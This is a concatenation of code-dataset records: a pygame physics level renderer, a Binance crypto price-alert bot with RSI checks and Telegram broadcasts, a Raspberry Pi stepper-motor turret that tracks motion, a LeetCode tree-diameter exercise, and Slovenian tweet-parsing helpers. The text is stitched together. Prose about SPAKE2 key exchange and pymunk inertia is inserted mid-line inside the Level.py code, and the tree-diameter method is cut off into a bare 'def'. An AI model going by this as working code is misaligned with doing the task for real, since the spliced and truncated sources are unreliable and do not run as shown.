rotate the surface\n rotated_surface = pg.transform.rotate(surface, rot)\n # get the rect of the surface\n rect = rotated_surface.get_rect(center=shape.body.position)\n if self._car.body.position[0] > 420:\n rect.x -= self._car.body.position[0] - 420\n self._screen.blit(rotated_surface, (rect.x, rect.y))\n # draw all circle shapes\n for shape_list in self._shapes_to_draw['circle']:\n shape = shape_list[0]\n x, y = shape.body.position\n if self._car.body.position[0] > 420:\n x -= self._car.body.position[0] - 420\n pg.draw.circle(self._screen, shape_list[1], center=(x, y), radius=shape.radius)\n # draw all segment(line) shapes\n for shape_list in self._shapes_to_draw['segment']:\n shape = shape_list[0]\n left = shape.a\n right = shape.b\n if self._car.body.position[0] > 420:\n offset = self._car.body.position[0] - 420\n left = (left[0]-offset, left[1])\n right = (right[0]-offset, right[1])\n pg.draw.line(self._screen, shape_list[1], left, right, int(shape.radius)*2)\n\n def update(self):\n for val in 
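The interop script above drives one side of the exchange over stdin/stdout. A minimal sketch of a complete exchange with the same spake2 library, both sides in one process and using the default parameters:

from spake2 import SPAKE2_A, SPAKE2_B

alice = SPAKE2_A(b"shared password")
bob = SPAKE2_B(b"shared password")
msg_a = alice.start()         # bytes Alice sends to Bob
msg_b = bob.start()           # bytes Bob sends to Alice
key_a = alice.finish(msg_b)
key_b = bob.finish(msg_a)
assert key_a == key_b         # both sides derive the same session key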
self._shapes_to_draw.keys():\n for num, shape_list in enumerate(self._shapes_to_draw[val]):\n shape = shape_list[0]\n if shape.body.position[1] > 720:\n self._shapes_to_draw[val].pop(num)\n self._space.remove(shape)\n\n\n","sub_path":"Simluator/Level.py","file_name":"Level.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67370890","text":"import os\nimport sys\nimport json\nfrom operator import itemgetter\nimport re\nimport memcache\nimport codecs\nimport logging\nimport sys\nimport pymysql\nimport time\nimport requests\nimport re\nimport configparser\nimport datetime\nimport redis\nroot = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['LD_LIBRARY_PATH'] = '/usr/local/lib'\nsys.path.append(root + '/python')\n\nimport talib\nimport numpy as np\nimport ccxt # noqa: E402\n\nredis_server = redis.Redis(host='localhost', port=6379, db=0)\n\ndef get_exchange():\n\t\n\t#Read in our apikeys and accounts\n\tconfig = configparser.ConfigParser()\n\tconfig.read('/root/akeys/b.conf')\n\tconf=config['binance']\n\t\n\tbinance_api_key=config['binance']['API_KEY']\n\tbinance_api_secret=config['binance']['API_SECRET']\n\t\n\texchange = ccxt.binance({\n 'apiKey': binance_api_key,\n 'secret': binance_api_secret,\n 'enableRateLimit': True,\n 'rateLimit': 3600,\n 'verbose': False, # switch it to False if you don't want the HTTP log\n\t})\n\treturn(exchange)\n\nexchange=get_exchange()\t\n\ndef broadcast(chatid,text):\n\tconfig = configparser.ConfigParser()\n\tconfig.read('/root/akeys/b.conf')\n\ttelegram_id=config['binance']['TELEGRAM_ID']\n\ttoken = telegram_id\n\turl = \"https://api.telegram.org/\"+ token + \"/sendMessage?chat_id=\" + chatid+\"&text=\"+str(text)+\"&parse_mode=HTML\"\n\tr=requests.get(url)\n\thtml = r.content\n\ndef fetch_prices(exchange, symbol):\n\tticker = exchange.fetch_ticker(symbol.upper())\n\treturn(ticker)\n \n\ndef fetch_last_order(exchange,symbol):\n\tret=exchange.fetch_closed_orders (symbol, 1,\"\");\n\t#print(ret)\n\tif ret:\n\t\tdata=ret[-1]['info']\n\t\tside=data['side']\n\t\tprice=data['price']\n\t\tprint(\"returning: 1\")\n\telse:\n\t\tprint(\"returning: 0\")\n\t\tdata=0\n\treturn data\n\ndef die():\n\tsys.exit(\"fuck\")\n\ndef get_price(pair,start_ts,end_ts):\n\n\tp=0\n\t#try:\n\tstart_ts=start_ts+\"000\"\n\turl=\"https://api.binance.com/api/v1/klines?symbol=\"+pair+\"&startTime=\"+str(start_ts)+\"&interval=1m\"\n\tprint(url)\n\tr=requests.get(url)\n\tres = (r.content.strip())\n\tstatus = r.status_code\n\tprint(status)\n\trsi_status=''\n\tprint(res)\n\ttrades = json.loads(res.decode('utf-8'))\n\tdata=trades[0]\n\tprice=float(data[4])\n\treturn(price)\n\t#except:\n\t#\tp=1\n\ndef diff_percent(low,high):\n\tprices = [low,high]\n\tfor a, b in zip(prices[::1], prices[1::1]):\n\t\tpdiff=100 * (b - a) / a\n\tpdiff=round(pdiff,2)\n\n\treturn(pdiff)\n\ndef mojo(pair,price_now):\n\n\tmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\n\tblank=1\n\t\n\tts_now = datetime.datetime.now()\n\tts_now_ts=int(time.mktime(ts_now.timetuple()))\t\n\tts_now_human=datetime.datetime.fromtimestamp(ts_now_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\tkey=str(pair)+str(\"pkey-1hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_1hour = ts_now - datetime.timedelta(seconds=3600)\n\tts_1hour_ts=int(time.mktime(ts_1hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_1hour_ts).strftime(\"%Y-%m-%d 
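The _create_ball helper in the Level.py record above takes a precomputed inertia. If I recall the pymunk API correctly, pymunk.moment_for_circle can derive it from the mass and radius, so a hedged sketch of building the same kind of body might look like:

import pymunk as pm

mass, radius = 1.0, 14.0
inertia = pm.moment_for_circle(mass, 0, radius)  # inner radius 0: solid disc
body = pm.Body(mass, inertia, pm.Body.DYNAMIC)
body.position = (100, 50)
shape = pm.Circle(body, radius)
shape.friction = 0.9
shape.elasticity = 0.3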
%H:%M:%S\")\n\t\n\tprice_1_hours_ago=get_price(pair,str(ts_1hour_ts),str(ts_now_ts))\n\tif price_1_hours_ago:\n\t\tprice_1_hours_ago=float(price_1_hours_ago)\n\t\tprint(\"P1HA\")\n\t\tprint(price_1_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_1_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 1 Hour Ago \"+str(tsd)+\" : \"+str(price_1_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-3hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_3hour = ts_now - datetime.timedelta(seconds=10800)\n\tts_3hour_ts=int(time.mktime(ts_3hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_3hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_3_hours_ago=get_price(pair,str(ts_3hour_ts),str(ts_now_ts))\n\tif price_3_hours_ago:\n\t\tprice_3_hours_ago=float(price_3_hours_ago)\n\t\tprint(\"P3HA\")\n\t\tprint(price_3_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_3_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 3 Hour Ago: \"+str(tsd)+\" : \"+str(price_3_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-6hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_6hour = ts_now - datetime.timedelta(seconds=21600)\n\tts_6hour_ts=int(time.mktime(ts_6hour.timetuple()))\n\ttsd=datetime.datetime.fromtimestamp(ts_6hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_6_hours_ago=get_price(pair,str(ts_6hour_ts),str(ts_now_ts))\n\tif price_6_hours_ago:\n\t\tprice_6_hours_ago=float(price_6_hours_ago)\n\t\tprint(\"P6HA\")\n\t\tprint(price_6_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_6_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" \"+str(price_now)+\" 6 Hour Ago: \"+str(tsd)+\" : \"+str(price_6_hours_ago)+\" Diff %: \"+str(price_diff))\n\t\n\tkey=str(pair)+str(\"pkey-12hour\")\n\tif(mc.get(key)):\n\t\tmc.delete(key)\n\t\n\tts_12hour = ts_now - datetime.timedelta(seconds=43200)\n\tts_12hour_ts=int(time.mktime(ts_12hour.timetuple()))\n\n\ttsd=datetime.datetime.fromtimestamp(ts_12hour_ts).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\n\tprice_12_hours_ago=get_price(pair,str(ts_12hour_ts),str(ts_now_ts))\n\tif price_12_hours_ago:\n\t\tprice_12_hours_ago=float(price_12_hours_ago)\n\t\t\n\t\tprint(\"P12HA\")\n\t\tprint(price_12_hours_ago)\n\t\tprice_now=float(price_now)\n\t\tprice_diff=diff_percent(price_12_hours_ago,price_now)\n\t\tif price_diff:\t\t\n\t\t\tmc.set(key,price_diff,86400)\n\t\t\tprint(\"ALERTS::: Price Now: \"+str(ts_now_human)+\" \"+str(price_now)+\" 12 Hour Ago: \"+str(tsd)+\" : \"+str(price_12_hours_ago)+\" Diff %: \"+str(price_diff))\n\t#except:\n\t#\tprint(\"\")\n\t#sys.exit(\"Die\")\n\ndef get_rsi(pair,interval):\n\n\tarr = []\n\tout = []\n\tfin = []\n\turl=\"https://api.binance.com/api/v1/klines?symbol=\"+pair+\"&interval=\"+interval+\"&limit=500\"\n\tprint(url)\n\tr=requests.get(url)\n\tres = (r.content.strip())\n\tstatus = r.status_code\n\tprint(\"Status: \"+str(status))\n\trsi_status=''\n\tprint(\"DBRSI: \"+str(res))\n\ttrades = json.loads(res.decode('utf-8'))\n\n\tlp=0\n\tfor trade in 
trades:\n\t\topen_price=float(trade[0])\n\t\tclose_price=float(trade[4])\n\t\thigh_price=float(trade[2])\n\t\tlow_price=float(trade[3])\n\t\tif close_price>0 and close_price!=lp:\n\t\t\tarr.append(close_price)\t\n\t\tlp=close_price\n\n\tnp_arr = np.array(arr,dtype=float)\n\toutput=talib.RSI(np_arr,timeperiod=15)\n\n\tfor chkput in output:\n\t\tif chkput>0:\n\t\t\tfin.append(chkput)\n\t\t\n\trsi=float(fin[-1])\n\trsi=round(rsi)\n\treturn(rsi)\n\ndef fetch_order_book(exchange,symbol,type,qlimit):\n\tlimit = 1000\n\tret=exchange.fetch_order_book(symbol, limit)\n\n\tif type=='bids':\n\t\tbids=ret['bids']\n\t\treturn bids\n\telse:\n\t\tasks=ret['asks']\n\t\treturn asks\n\ndef main():\n\t\n\tfrom datetime import date\n\ttickers=exchange.fetchTickers()\n\tmc = memcache.Client(['127.0.0.1:11211'], debug=0)\n\tfor coin in tickers:\n\n\t\tfirst=0\n\t\tskip=1\n\t\tbroadcast_message=0\n\t\tprice_jump=0\n\t\tcoin=str(coin)\n\t\trsi=100\n\t\tbtc_price=float(tickers['BTC/USDT']['close'])\n\t\tbtc_percent=float(tickers['BTC/USDT']['percentage'])\n\n\t\tsymbol=tickers[coin]['info']['symbol']\n\t\tcsymbol=coin\n\t\tcsymbol=csymbol.replace(\"/\",\"_\",1)\n\t\tdet=int(0)\n\t\ttoday = str(date.today())\n\t\t\n\t\tif 'USDT' in symbol:\n\t\t\tmin_vol=1000000\n\t\t\tskip=0\n\t\telif 'BTC' in symbol:\n\t\t\tmin_vol=500\n\t\t\tskip=0\n\t\telif 'BNB' in symbol:\n\t\t\tmin_vol=50000\n\t\t\t\n\t\tkey = str(date.today())+str('ALERTS-LAST_PRICE')+str(csymbol)\n\t\t\n\t\tlast_price=0\n\t\tif mc.get(key):\n\t\t\tlast_price=mc.get(key)\n\t\t\t#print(\"ALERTS DB: GOT LP: \"+str(last_price))\n\t\telse:\n\t\t\tfirst=1\n\t\t\t\n\t\tdata=str()\n\t\trow=tickers[coin]\n\t\tsymbol=row['info']['symbol']\n\t\tclose=row['close']\n\t\tpercent=row['percentage']\n\t\tlow=row['low']\n\t\thigh=row['high']\n\t\tqv=row['quoteVolume']\n\t\tprice=close\n\t\tdprint=1\n\t\tpair=symbol\n\t\tour_percent=0\n\t\tlast_price=0\n\t\t\n\t\tif skip!=1 and qv >=min_vol:\n\t\t\t\n\t\t\tprices = [low,high]\n\t\t\tfor a, b in zip(prices[::1], prices[1::1]):\n\t\t\t\tpdiff=100 * (b - a) / a\n\t\t\t\n\t\t\tpdiff=round(pdiff,2)\n\t\t\t\t\n\t\t\tspread=pdiff\n\n\t\t\tpair=symbol\n\n\t\t\tif last_price>0:\n\t\t\t\tprint(\"DBLP: \"+str(last_price))\n\t\t\t\tprint(\"PRICE: \"+str(price))\n\t\t\t\tdarr = [last_price,price]\n\t\t\t\tfor a, b in zip(darr[::1], darr[1::1]):\n\t\t\t\t\tprice_jump=100 * (b - a) / a\n\t\t\t\t\tprice_jump=round(price_jump,2)\n\n\t\t\tif percent>1 and price_jump>0.10 or percent>1 and first==1:\n\t\n\t\t\t\tkey = str(date.today())+str('ALERTSDB')+str(csymbol)\n\t\t\t\tif mc.get(key):\n\t\t\t\t\tdprint=2\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ALERTS DEBUG::: LP: \"+str(last_price)+\" P: \"+str(price)+\" D: \"+str(price_jump))\n\t\n\t\t\t\t\tdet=int(1)\n\t\t\t\t\tmc.set(key,1,120)\n\t\t\t\t\t\n\t\t\t\t\ttry:\n\t\t\t\t\t\trsi_3m=get_rsi(symbol,'3m')\n\t\t\t\t\t\trsi_5m=get_rsi(symbol,'5m')\n\t\t\t\t\t\trsi_stats=\"RSI 3M: \"+str(rsi_3m)+\" RSI 5M: \"+str(rsi_5m)\n\t\t\t\t\t\tmojo(symbol,close)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-1hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\tone_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tone_hours=0\n\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-3hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\tthree_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tthree_hours=0\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-6hour\")\n\t\t\t\t\t\tif 
mc.get(key):\n\t\t\t\t\t\t\tsix_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsix_hours=0\n\t\t\t\t\t\t\n\t\t\t\t\t\tkey=str(pair)+str(\"pkey-12hour\")\n\t\t\t\t\t\tif mc.get(key):\n\t\t\t\t\t\t\ttwelve_hours=mc.get(key)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttwelve_hours=0\n\t\t\t\t\n\t\t\t\t\t\tlink='https://www.binance.com/en/trade/pro/'+csymbol\n\t\t\t\t\t\talert_type=':::PRICE ALERT: '+str(percent)+'%:::'\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tdata_add=\"1H: \"+str(one_hours)+str('%')+\", 3H: \"+str(three_hours)+str('%')+\", 6H: \"+str(six_hours)+\"%, 12H: \"+str(twelve_hours)+str('%')\n\t\t\t\t\t\tdata=''+str(symbol)+str(alert_type)+\"\\nPrice: \"+str(close)+' ('+str(percent)+'%)' + \"\\nSpread: \"+str(pdiff)+\"%\\nBTC Price: \"+str(btc_price)+' ('+str(btc_percent)+'%'+')'+\"\\n\"+str(rsi_stats)+\"\\n\"+str(data_add)+\"\\n\"+str(link)\n\n\t\t\t\t\t\ttimestamp=time.time()\n\t\t\t\t\t\tts_raw=timestamp\n\t\t\t\t\t\tdate_time=datetime.datetime.fromtimestamp(timestamp).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\t\t\t\tdate_today=str(date.today())\t\t\t\t\t\t\t\n\t\t\t\t\t\talert_key_all=str(date_today)+'-NALERTS'\n\t\t\t\t\t\talert_key_symbol=str(date_today)+str(symbol)+'-NALERTS'\n\t\t\t\t\t\talert_list_today=str(date_today)+'-NALERTLIST'\n\t\t\t\t\t\tsymbol_ids=str(symbol)+'-NIDS'\n\t\t\t\t\t\tsymbol_hash_detailed=str(symbol)+'-'+str(ts_raw)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tdata=str(data)+\"\\n\\nThis Alert Was Sent AT: \"+str(date_time)+\" GMT\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tpdata=str(date_time)+\"\\t\"+str(price)+\"\\t\"+str(percent)\n\t\t\t\t\t\tredis_server.rpush(alert_key_all,pdata)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tredis_server.sadd(alert_list_today,symbol)\n\n\t\t\t\t\t\t#Add Unique Timestamp to list for this symbol, will use as identifer for hash later\n\t\t\t\t\t\tredis_server.sadd(symbol_ids,ts_raw)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\tdetail_hash = {\"date\":str(date_today),\n\t\t\t\t\t\t\"date_time\":str(date_time), \n\t\t\t\t\t\t\"symbol\":str(symbol), \n\t\t\t\t\t\t\"alert_type\":str(alert_type), \n\t\t\t\t\t\t\"price\":float(price), \n\t\t\t\t\t\t\"percent\":float(percent), \n\t\t\t\t\t\t\"high\":str(high), \n\t\t\t\t\t\t\"low\":str(low), \n\t\t\t\t\t\t\"volume\":int(qv),\n\t\t\t\t\t\t\"spread\":float(spread),\n\t\t\t\t\t\t\"rsi_3mins\":float(rsi_3m),\n\t\t\t\t\t\t\"rsi_5mins\":float(rsi_5m),\n\t\t\t\t\t\t\"btc_price\":str(btc_price),\n\t\t\t\t\t\t\"btc_percent\":str(btc_percent),\n\t\t\t\t\t\t\"link\":str(link),\n\t\t\t\t\t\t}\n\t\t\n\t\t\t\t\t\tprint(\"Writing detailed alert hash data to: \"+str(symbol_hash_detailed))\n\t\t\t\t\t\tprint(detail_hash)\n\t\t\t\t\t\tredis_server.hmset(symbol_hash_detailed, detail_hash)\n\n\t\t\t\t\t\tprint(\"Pushing coin to todays alert list: \"+str(symbol))\n\t\t\t\t\t\tprint(data)\n\n\t\t\t\t\t\tkey = str(date.today())+str('ALERTS-LAST_PRICE')+str(csymbol)\n\t\t\t\t\t\tmc.set(key,price,86400)\n\n\t\t\t\t\t\t#broadcast('693711905',data)\t\n\t\t\t\t\t\t#broadcast('420441454',data)\t\n\t\t\t\t\t\t#broadcast('446619309',data)\t\n\t\t\t\t\t\t#broadcast('490148813',data)\t\n\t\t\t\t\t\t#broadcast('110880375',data)\t\n\t\t\t\t\t\t#broadcast('699448304',data)\t\n\t\t\t\t\t\t#broadcast('593213791',data)\t\n\t\t\t\t\t\t#broadcast('506872080',data)\t\n\t\t\t\t\t\t#broadcast('543018578',data)\n\t\t\t\t\t\t#broadcast('503482955',data)\n\t\t\t\t\t\ttime.sleep(10)\t\n\t\t\t\t\t\t#broadcast('429640253',data)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint(\"threw error\")\n\t\t\t\t\t\ttime.sleep(5)\n\t\t\t\t\nwhile 
True:\n\t#try:\n\tmain()\n\t#except:\n\t#print(\"error\")\n\ttime.sleep(5)\n","sub_path":"bots/alerts2.py","file_name":"alerts2.py","file_ext":"py","file_size_in_byte":11835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78039573","text":"#changed 8-12-2018\n#V1\ntry:\n import cv2\nexcept Exception as e:\n print(\"Warning: OpenCV not installed. To use motion detection, make sure you've properly configured OpenCV.\")\n\nimport time\nimport _thread\nimport threading\nimport atexit\nimport sys\nimport termios\nimport contextlib\nimport picamera\nimport picamera.array\nimport numpy as np\nimport io\n\nimport imutils\nimport RPi.GPIO as GPIO\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor\n\n\n### User Parameters ###\n\nMOTOR_X_REVERSED = True\n\nMAX_STEPS_X = 30\n\nRELAY_PIN = 22\n\n\noutput = np.empty((240, 320, 3), dtype = np.uint8)\n\n#######################\n\n\n@contextlib.contextmanager\ndef raw_mode(file):\n \"\"\"\n Magic function that allows key presses.\n :param file:\n :return:\n \"\"\"\n old_attrs = termios.tcgetattr(file.fileno())\n new_attrs = old_attrs[:]\n new_attrs[3] = new_attrs[3] & ~(termios.ECHO | termios.ICANON)\n try:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, new_attrs)\n yield\n finally:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, old_attrs)\n\n\nclass VideoUtils(object):\n \"\"\"\n Helper functions for video utilities.\n \"\"\"\n def __init__(self, camera):\n self.camera = camera\n self.prev_frame = ''\n self.tempFrame = ''\n\n def rasp_find_motion(self, stream, callback=0):\n\n frame = stream\n\n # resize the frame, convert it to grayscale, and blur it\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n # if the first frame is None, initialize it\n if self.prev_frame == '':\n self.prev_frame = gray\n self.tempFrame = gray\n return\n else:\n delta = cv2.absdiff(self.tempFrame, gray)\n self.tempFrame = gray\n tst = cv2.threshold(delta, 5, 255, cv2.THRESH_BINARY)[1]\n tst = cv2.dilate(tst, None, iterations=2)\n print (\"Done.\\n Waiting for motion.\")\n if not cv2.countNonZero(tst) > 0:\n self.prev_frame = gray\n else:\n print ('not done')\n\n # compute the absolute difference between the current frame and\n # first frame\n frameDelta = cv2.absdiff(self.prev_frame, gray)\n print(frameDelta)\n thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n\n # dilate the thresholded image to fill in holes, then find contours\n # on thresholded image\n thresh = cv2.dilate(thresh, None, iterations=2)\n c = self.get_best_contour(thresh.copy(), 5000)\n\n if c is not None:\n # compute the bounding box for the contour, draw it on the frame,\n # and update the text\n (x, y, w, h) = cv2.boundingRect(c)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n callback(c, frame)\n\n\n\n def get_best_contour(self, imgmask, threshold):\n im, contours, hierarchy = cv2.findContours(imgmask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n best_area = threshold\n best_cnt = None\n for cnt in contours:\n area = cv2.contourArea(cnt)\n if area > best_area:\n best_area = area\n best_cnt = cnt\n return best_cnt\n\n\nclass Turret(object):\n \"\"\"\n Class used for turret control.\n \"\"\"\n\n def __init__(self, camera):\n self.camera = camera\n self.VideoUtils = VideoUtils(camera)\n\n # create a default object, no changes to I2C address or frequency\n self.mh = 
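get_rsi in the alerts2.py record above feeds Binance kline closes into talib. The essential call, with made-up closes; talib returns NaN for the warm-up window, which is why the script filters its output before taking the last value:

import numpy as np
import talib

closes = np.array([44.3, 44.1, 44.2, 43.6, 44.3, 44.8, 45.1, 45.4,
                   45.8, 46.1, 45.9, 46.2, 46.3, 46.0, 46.4, 46.2])
rsi = talib.RSI(closes, timeperiod=14)   # first 14 entries are NaN
print(round(float(rsi[-1])))             # the current RSI reading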
Adafruit_MotorHAT()\n atexit.register(self.__turn_off_motors)\n\n # Stepper motor 1\n self.sm_x = self.mh.getStepper(200, 1) # 200 steps/rev, motor port #1\n self.sm_x.setSpeed(5) # 5 RPM\n self.current_x_steps = 0\n\n\n # Relay\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(RELAY_PIN, GPIO.OUT)\n GPIO.output(RELAY_PIN, GPIO.LOW)\n\n\n def calibrate(self):\n \"\"\"\n Waits for input to calibrate the turret's axis\n :return:\n \"\"\"\n Turret.move_backward(self.sm_x, 5)\n\n\n def motion_detection_rasp(self, frame):\n \"\"\"\n Uses the camera to move the turret. OpenCV ust be configured to use this.\n :return:\n \"\"\"\n self.VideoUtils.rasp_find_motion(frame, self.__move_axis)\n\n def __move_axis(self, contour, frame):\n (v_h, v_w) = frame.shape[:2]\n (x, y, w, h) = cv2.boundingRect(contour)\n\n # find height\n target_steps_x = (2*MAX_STEPS_X * (x + w / 2) / v_w) - MAX_STEPS_X\n\n print (\"x: %s\" % (str(target_steps_x)))\n print (\"current x: %s\" % (str(self.current_x_steps)))\n\n t_x = threading.Thread()\n\n # move x\n\n stprs_diff = int(target_steps_x - self.current_x_steps)\n print(stprs_diff)\n\n if (target_steps_x - self.current_x_steps) > 1:\n self.current_x_steps += stprs_diff\n t_x = threading.Thread(target=Turret.move_forward, args=(self.sm_x, stprs_diff+1,))\n elif (target_steps_x - self.current_x_steps) < -1:\n self.current_x_steps += stprs_diff\n t_x = threading.Thread(target=Turret.move_backward, args=(self.sm_x, -stprs_diff-1,))\n\n t_x.start()\n\n t_x.join()\n\n def interactive(self):\n \"\"\"\n Starts an interactive session. Key presses determine movement.\n :return:\n \"\"\"\n\n Turret.move_forward(self.sm_x, 1)\n\n print ('Commands: Pivot with (a) and (d). Tilt with (w) and (s). Exit with (q)\\n')\n with raw_mode(sys.stdin):\n try:\n while True:\n ch = sys.stdin.read(1)\n if not ch or ch == \"q\":\n break\n\n if ch == \"a\":\n if MOTOR_X_REVERSED:\n Turret.move_backward(self.sm_x, 5)\n else:\n Turret.move_forward(self.sm_x, 5)\n elif ch == \"d\":\n if MOTOR_X_REVERSED:\n Turret.move_forward(self.sm_x, 5)\n else:\n Turret.move_backward(self.sm_x, 5)\n elif ch == \"\\n\":\n Turret.fire()\n\n except (KeyboardInterrupt, EOFError):\n pass\n\n\n @staticmethod\n def move_forward(motor, steps):\n \"\"\"\n Moves the stepper motor forward the specified number of steps.\n :param motor:\n :param steps:\n :return:\n \"\"\"\n motor.step(steps, Adafruit_MotorHAT.FORWARD, Adafruit_MotorHAT.INTERLEAVE)\n return\n\n @staticmethod\n def move_backward(motor, steps):\n \"\"\"\n Moves the stepper motor backward the specified number of steps\n :param motor:\n :param steps:\n :return:\n \"\"\"\n motor.step(steps, Adafruit_MotorHAT.BACKWARD, Adafruit_MotorHAT.INTERLEAVE)\n return\n\n def __turn_off_motors(self):\n \"\"\"\n Recommended for auto-disabling motors on shutdown!\n :return:\n \"\"\"\n self.mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)\n self.mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)\n return\n","sub_path":"turret.py","file_name":"turret.py","file_ext":"py","file_size_in_byte":7457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440774770","text":"\"\"\"\nhttps://leetcode.com/problems/diameter-of-binary-tree/\n\n\"\"\"\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n import math\n def 
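__move_axis in the turret.py record above converts the detected contour's horizontal centre into a stepper target. The mapping is a straight rescale of [0, frame_width] onto [-MAX_STEPS_X, +MAX_STEPS_X]; a small worked sketch:

MAX_STEPS_X = 30

def target_steps(x, w, frame_width):
    centre = x + w / 2
    return (2 * MAX_STEPS_X * centre / frame_width) - MAX_STEPS_X

print(target_steps(0, 0, 500))      # -30.0: target at the left edge
print(target_steps(230, 40, 500))   #   0.0: target centred in the frame
print(target_steps(480, 40, 500))   #  30.0: target at the right edge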
root = TreeNode(1)\nroot.left = TreeNode(2)\nroot.right = TreeNode(3)\nroot.left.left = TreeNode(4)\nroot.left.right = TreeNode(5)\ns=Solution()\nprint(s.diameterOfBinaryTree(root))","sub_path":"Tree/BT-diameter.py","file_name":"BT-diameter.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"517072201","text":"#my functions\r\ndef ime(tvit):\r\n    return tvit[:tvit.index(':')]\r\n\r\ndef izloci_besedo(beseda):\r\n    nekaj = \"\"\r\n    for a in beseda:\r\n        if a.isalnum():\r\n            nekaj += a\r\n        if a == \"-\":\r\n            nekaj += a\r\n    return nekaj\r\n\r\ndef mentions(besedilo):\r\n    # collect the @-mentions that appear in the text\r\n    rezultat = []\r\n    for beseda in besedilo.split():\r\n        if \"@\" in beseda:\r\n            rezultat.append(izloci_besedo(beseda))\r\n    return rezultat\r\n\r\n\r\ndef besedilo(tvit):\r\n    return tvit[tvit.index(':') + 2:]\r\n\r\ndef zadnji_tvit(tviti):\r\n    slovar = {}\r\n    for a in tviti:\r\n        slovar[ime(a)] = besedilo(a)\r\n    return slovar\r\n\r\ndef prvi_tvit(tviti):\r\n    slovar = {}\r\n    for a in tviti:\r\n        if ime(a) not in slovar:\r\n            slovar[ime(a)] = besedilo(a)\r\n    return slovar\r\n\r\ndef prestej_tvite(tviti):\r\n    slovar = {}\r\n    for a in tviti:\r\n        if ime(a) not in slovar:\r\n            slovar[ime(a)] = 1\r\n        else:\r\n            slovar[ime(a)] += 1\r\n    return slovar\r\n\r\n#THIS WORKS\r\n\r\ndef omembe(tviti):\r\n    slovar = {}\r\n    for a in tviti:\r\n        if ime(a) not in slovar:\r\n            slovar[ime(a)] = []\r\n        for n in a.split():\r\n            if \"@\" in n:\r\n                slovar[ime(a)].append(izloci_besedo(n))\r\n    return slovar\r\n\r\ndef neomembe(ime, omembe):\r\n    imena = []\r\n    for a in omembe:\r\n        imena.append(a)\r\n    izkljuceni = omembe[ime] + [ime]\r\n    ret = []\r\n    for n in imena:\r\n        if n not in izkljuceni:\r\n            